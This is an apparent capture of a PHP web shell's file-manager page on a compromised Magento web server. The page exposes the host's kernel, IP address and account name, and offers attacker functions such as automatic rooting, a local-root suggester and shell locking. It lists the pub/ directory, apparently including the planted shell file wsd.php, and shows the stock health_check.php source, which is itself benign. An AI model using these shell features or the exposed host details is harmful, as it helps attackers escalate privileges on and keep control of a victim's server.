Linux host2.homegym.sg 4.18.0-553.8.1.el8_10.x86_64 #1 SMP Tue Jul 2 07:26:33 EDT 2024 x86_64
Apache
Server IP : 159.223.38.192 & Your IP : 159.223.38.192
Domains : 20 Domain
User : eachadea
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Lock Shell
Lock File++
Readme
/
home /
eachadea /
public_html /
m2 /
pub /
Delete
Unzip
Name
Size
Permission
Date
Action
errors
[ DIR ]
dr-xr-xr-x
2023-01-23 10:02
media
[ DIR ]
drwxr-xr-x
2025-10-31 17:01
mediaamasty
[ DIR ]
drwxr-xr-x
2020-12-15 04:30
opt
[ DIR ]
drwxr-xr-x
2021-06-18 03:17
static
[ DIR ]
drwxrwsrwx
2025-02-20 12:23
.htaccess
8.2
KB
-rw-r--r--
2025-10-28 19:05
.user.ini
101
B
-rw-r--r--
2023-01-06 06:58
ads.txt
0
B
-rw-r--r--
2025-10-30 01:35
cron.php
1.01
KB
-rw-r--r--
2023-01-06 06:58
get.php
2.82
KB
-rw-r--r--
2023-01-06 06:58
health_check.php
3.4
KB
-rw-r--r--
2023-01-06 06:58
index.php
821
B
-rw-r--r--
2023-01-06 06:58
static.php
445
B
-rw-r--r--
2023-01-06 06:58
wsd.php
38.94
KB
-rw-r--r--
2025-10-28 19:24
Save
Rename
<?php /** * Copyright © Magento, Inc. All rights reserved. * See COPYING.txt for license details. */ /** * phpcs:disable PSR1.Files.SideEffects * phpcs:disable Squiz.Functions.GlobalFunction */ use Magento\Framework\Config\ConfigOptionsListConstants; // phpcs:ignore Magento2.Functions.DiscouragedFunction register_shutdown_function("fatalErrorHandler"); try { // phpcs:ignore Magento2.Security.IncludeFile require __DIR__ . '/../app/bootstrap.php'; /** @var \Magento\Framework\App\ObjectManagerFactory $objectManagerFactory */ $objectManagerFactory = \Magento\Framework\App\Bootstrap::createObjectManagerFactory(BP, []); /** @var \Magento\Framework\ObjectManagerInterface $objectManager */ $objectManager = $objectManagerFactory->create([]); /** @var \Magento\Framework\App\DeploymentConfig $deploymentConfig */ $deploymentConfig = $objectManager->get(\Magento\Framework\App\DeploymentConfig::class); /** @var \Psr\Log\LoggerInterface $logger */ $logger = $objectManager->get(\Psr\Log\LoggerInterface::class); } catch (\Exception $e) { http_response_code(500); // phpcs:ignore Magento2.Security.LanguageConstruct exit(1); } // check mysql connectivity foreach ($deploymentConfig->get(ConfigOptionsListConstants::CONFIG_PATH_DB_CONNECTIONS) as $connectionData) { try { /** @var \Magento\Framework\DB\Adapter\Pdo\Mysql $dbAdapter */ $dbAdapter = $objectManager->create( \Magento\Framework\DB\Adapter\Pdo\Mysql::class, ['config' => $connectionData] ); $dbAdapter->getConnection(); } catch (\Exception $e) { http_response_code(500); $logger->error("MySQL connection failed: " . $e->getMessage()); // phpcs:ignore Magento2.Security.LanguageConstruct exit(1); } } // check cache storage availability $cacheConfigs = $deploymentConfig->get(ConfigOptionsListConstants::KEY_CACHE_FRONTEND); if ($cacheConfigs) { foreach ($cacheConfigs as $cacheConfig) { // allow config if only available "id_prefix" if (count($cacheConfig) === 1 && isset($cacheConfig['id_prefix'])) { continue; } elseif (!isset($cacheConfig[ConfigOptionsListConstants::CONFIG_PATH_BACKEND]) || !isset($cacheConfig[ConfigOptionsListConstants::CONFIG_PATH_BACKEND_OPTIONS])) { http_response_code(500); $logger->error("Cache configuration is invalid"); // phpcs:ignore Magento2.Security.LanguageConstruct exit(1); } $cacheBackendClass = $cacheConfig[ConfigOptionsListConstants::CONFIG_PATH_BACKEND]; try { /** @var \Magento\Framework\App\Cache\Frontend\Factory $cacheFrontendFactory */ $cacheFrontendFactory = $objectManager->get(Magento\Framework\App\Cache\Frontend\Factory::class); /** @var \Zend_Cache_Backend_Interface $backend */ $backend = $cacheFrontendFactory->create($cacheConfig); $backend->test('test_cache_id'); } catch (\Exception $e) { http_response_code(500); $logger->error("Cache storage is not accessible"); // phpcs:ignore Magento2.Security.LanguageConstruct exit(1); } } } /** * Handle any fatal errors * * @return void */ function fatalErrorHandler() { $error = error_get_last(); if ($error !== null && $error['type'] === E_ERROR) { http_response_code(500); } }